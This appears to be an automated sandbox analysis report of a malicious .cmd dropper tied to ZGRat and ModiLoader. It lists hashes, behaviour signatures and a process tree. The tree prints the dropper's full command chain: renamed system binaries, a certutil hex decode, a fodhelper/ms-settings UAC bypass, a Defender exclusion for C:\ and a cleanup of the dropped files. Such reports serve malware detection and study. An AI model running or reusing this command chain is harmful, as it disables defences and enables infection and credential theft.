Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
13-05-2024 12:34
Static task
static1
Behavioral task
behavioral1
Sample
doc023561361500.cmd
Resource
win7-20240508-en
General
-
Target
doc023561361500.cmd
-
Size
3.5MB
-
MD5
dd0e66d9764dda9819678f30922aa6bd
-
SHA1
cc4937f70fc66f05c3c8d0df868a5bb82222a12c
-
SHA256
a092e4a960900082c38c3b96ba17b62efa3d8b7a558ea9964478afa459fcc1a5
-
SHA512
5279fbefb87e776e0c6cacd73610ff0ffada1f6493c01d39b5e44711cc37f1085bfa051f0e2235647f99a183b9c3bf1722dc3a0f760188b3c81b15c6de698206
-
SSDEEP
49152:uKh6qKOnA/Xl5c25Qnvo9pYPTLBOEKSKhFVq1ZDNBcKKBP78Vp+D6LWg:R
Malware Config
Signatures
-
Detect ZGRat V1 33 IoCs
resource yara_rule behavioral2/memory/3000-83-0x0000000031F10000-0x0000000031F6C000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-85-0x0000000034560000-0x00000000345BA000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-89-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-99-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-145-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-144-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-139-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-138-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-135-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-133-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-132-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-129-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-127-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-125-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-123-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-121-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-119-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-117-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-115-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-113-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-111-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-109-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-107-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-101-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-97-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-95-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-93-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-91-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-141-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-105-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-103-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-87-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 behavioral2/memory/3000-86-0x0000000034560000-0x00000000345B5000-memory.dmp family_zgrat_v1 -
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
ModiLoader Second Stage 2 IoCs
resource yara_rule behavioral2/memory/3000-78-0x0000000000400000-0x0000000001400000-memory.dmp modiloader_stage2 behavioral2/memory/3000-81-0x0000000000400000-0x0000000001400000-memory.dmp modiloader_stage2 -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation per.exe -
Executes dropped EXE 26 IoCs
pid Process 396 alpha.exe 2524 alpha.exe 1020 alpha.exe 4496 alpha.exe 4824 kn.exe 1720 alpha.exe 2512 alpha.exe 1916 alpha.exe 3440 alpha.exe 1572 xkn.exe 3960 alpha.exe 4904 ger.exe 2188 alpha.exe 3496 kn.exe 2856 per.exe 3548 alpha.exe 1200 Ping_c.pif 4464 alpha.exe 1656 alpha.exe 1148 alpha.exe 4352 alpha.exe 3456 alpha.exe 1208 alpha.exe 2772 alpha.exe 1796 alpha.exe 3000 gcggysoG.pif -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 20 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1200 set thread context of 3000 1200 Ping_c.pif 126 -
Kills process with taskkill 1 IoCs
pid Process 1192 taskkill.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\ms-settings\shell ger.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\ms-settings\shell\open ger.exe Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" ger.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\ms-settings\shell\open\command ger.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\ms-settings ger.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 18 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1572 xkn.exe 1572 xkn.exe 3000 gcggysoG.pif 3000 gcggysoG.pif -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1572 xkn.exe Token: SeDebugPrivilege 1192 taskkill.exe Token: SeDebugPrivilege 3000 gcggysoG.pif -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1736 wrote to memory of 636 1736 cmd.exe 86 PID 1736 wrote to memory of 636 1736 cmd.exe 86 PID 1736 wrote to memory of 396 1736 cmd.exe 87 PID 1736 wrote to memory of 396 1736 cmd.exe 87 PID 1736 wrote to memory of 2524 1736 cmd.exe 88 PID 1736 wrote to memory of 2524 1736 cmd.exe 88 PID 1736 wrote to memory of 1020 1736 cmd.exe 89 PID 1736 wrote to memory of 1020 1736 cmd.exe 89 PID 1020 wrote to memory of 2900 1020 alpha.exe 90 PID 1020 wrote to memory of 2900 1020 alpha.exe 90 PID 1736 wrote to memory of 4496 1736 cmd.exe 91 PID 1736 wrote to memory of 4496 1736 cmd.exe 91 PID 4496 wrote to memory of 4824 4496 alpha.exe 92 PID 4496 wrote to memory of 4824 4496 alpha.exe 92 PID 1736 wrote to memory of 1720 1736 cmd.exe 93 PID 1736 wrote to memory of 1720 1736 cmd.exe 93 PID 1720 wrote to memory of 4920 1720 alpha.exe 94 PID 1720 wrote to memory of 4920 1720 alpha.exe 94 PID 1736 wrote to memory of 2512 1736 cmd.exe 95 PID 1736 wrote to memory of 2512 1736 cmd.exe 95 PID 2512 wrote to memory of 1808 2512 alpha.exe 96 PID 2512 wrote to memory of 1808 2512 alpha.exe 96 PID 1736 wrote to memory of 1916 1736 cmd.exe 97 PID 1736 wrote to memory of 1916 1736 cmd.exe 97 PID 1916 wrote to memory of 1604 1916 alpha.exe 98 PID 1916 wrote to memory of 1604 1916 alpha.exe 98 PID 1736 wrote to memory of 3440 1736 cmd.exe 99 PID 1736 wrote to memory of 3440 1736 cmd.exe 99 PID 3440 wrote to memory of 1572 3440 alpha.exe 100 PID 3440 wrote to memory of 1572 3440 alpha.exe 100 PID 1572 wrote to memory of 3960 1572 xkn.exe 101 PID 1572 wrote to memory of 3960 1572 xkn.exe 101 PID 3960 wrote to memory of 4904 3960 alpha.exe 102 PID 3960 wrote to memory of 4904 3960 alpha.exe 102 PID 1736 wrote to memory of 2188 1736 cmd.exe 103 PID 1736 wrote to memory of 2188 1736 cmd.exe 103 PID 2188 wrote to memory of 3496 2188 alpha.exe 104 PID 2188 wrote to memory of 3496 2188 alpha.exe 104 PID 1736 wrote to memory of 2856 1736 cmd.exe 106 PID 1736 wrote to memory of 2856 1736 cmd.exe 106 PID 1736 wrote to memory of 3548 1736 cmd.exe 112 PID 1736 wrote to memory of 3548 1736 cmd.exe 112 PID 3548 wrote to memory of 1192 3548 alpha.exe 113 PID 3548 wrote to memory of 1192 3548 alpha.exe 113 PID 1736 wrote to memory of 1200 1736 cmd.exe 116 PID 1736 wrote to memory of 1200 1736 cmd.exe 116 PID 1736 wrote to memory of 1200 1736 cmd.exe 116 PID 1736 wrote to memory of 4464 1736 cmd.exe 117 PID 1736 wrote to memory of 4464 1736 cmd.exe 117 PID 1736 wrote to memory of 1656 1736 cmd.exe 118 PID 1736 wrote to memory of 1656 1736 cmd.exe 118 PID 1736 wrote to memory of 1148 1736 cmd.exe 119 PID 1736 wrote to memory of 1148 1736 cmd.exe 119 PID 1736 wrote to memory of 4352 1736 cmd.exe 120 PID 1736 wrote to memory of 4352 1736 cmd.exe 120 PID 1736 wrote to memory of 3456 1736 cmd.exe 121 PID 1736 wrote to memory of 3456 1736 cmd.exe 121 PID 1736 wrote to memory of 1208 1736 cmd.exe 122 PID 1736 wrote to memory of 1208 1736 cmd.exe 122 PID 1736 wrote to memory of 2772 1736 cmd.exe 123 PID 1736 wrote to memory of 2772 1736 cmd.exe 123 PID 1736 wrote to memory of 1796 1736 cmd.exe 124 PID 1736 wrote to memory of 1796 1736 cmd.exe 124 PID 1200 wrote to memory of 3000 1200 Ping_c.pif 126
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\doc023561361500.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"2⤵PID:636
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "2⤵
- Executes dropped EXE
PID:396
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"2⤵
- Executes dropped EXE
PID:2524
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵PID:2900
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\doc023561361500.cmd" "C:\\Users\\Public\\Ping_c.mp4" 92⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\doc023561361500.cmd" "C:\\Users\\Public\\Ping_c.mp4" 93⤵
- Executes dropped EXE
PID:4824
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"3⤵PID:4920
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"3⤵PID:1808
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"3⤵PID:1604
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3440 -
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3960 -
C:\Users\Public\ger.exeC:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""5⤵
- Executes dropped EXE
- Modifies registry class
PID:4904
-
-
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 122⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 123⤵
- Executes dropped EXE
PID:3496
-
-
-
C:\Windows \System32\per.exe"C:\\Windows \\System32\\per.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:2856
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3548 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1192
-
-
-
C:\Users\Public\Libraries\Ping_c.pifC:\Users\Public\Libraries\Ping_c.pif2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1200 -
C:\Users\Public\Libraries\gcggysoG.pifC:\Users\Public\Libraries\gcggysoG.pif3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3000
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"2⤵
- Executes dropped EXE
PID:4464
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"2⤵
- Executes dropped EXE
PID:1656
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \"2⤵
- Executes dropped EXE
PID:1148
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:4352
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:3456
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:1208
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2772
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:1796
-
-
C:\Windows\system32\SystemSettingsAdminFlows.exe"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper1⤵PID:4288
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.2MB
MD57ab12ae02c9531b7ffb6f4fbb24ee11d
SHA139eb62487ed993b200a0f015c10833643664b7a0
SHA25696608d5d3810216c29d3e9ed53a0c004b7787da923f17922bf8af3405b85d90a
SHA512eef676cc6928653d2b098ddfee4604dab46232fce3a20e32c7a2c505356c02d66b0cf045149bb4dd0e4b132635c639ddc006d482e502714ead7a7b64df3191c9
-
Filesize
66KB
MD5c116d3604ceafe7057d77ff27552c215
SHA1452b14432fb5758b46f2897aeccd89f7c82a727d
SHA2567bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301
SHA5129202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6
-
Filesize
2.4MB
MD54563cccfc27b4ee87597a7e6e73e7924
SHA1c5eac5e97193ce539f8b387c906abb7fc9c9488e
SHA256e0b66384d8a8da0fc7921d7bda9e6ea51abe4477009f82d27d4588c3444baea3
SHA512080f27b767139105dcc80d038a55b50413a934f4390bdc2f0271acde17b3a1e2eb90dee765de433b067b7deda9752ba5b6ab4470c12eddd4d36534dbb4b5351a
-
Filesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
Filesize
75KB
MD5227f63e1d9008b36bdbcc4b397780be4
SHA1c0db341defa8ef40c03ed769a9001d600e0f4dae
SHA256c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d
SHA512101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9
-
Filesize
1.6MB
MD5bd8d9943a9b1def98eb83e0fa48796c2
SHA170e89852f023ab7cde0173eda1208dbb580f1e4f
SHA2568de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2
SHA51295630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
48KB
MD585018be1fd913656bc9ff541f017eacd
SHA126d7407931b713e0f0fa8b872feecdb3cf49065a
SHA256c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5
SHA5123e5903cf18386951c015ae23dd68a112b2f4b0968212323218c49f8413b6d508283cc6aaa929dbead853bd100adc18bf497479963dad42dfafbeb081c9035459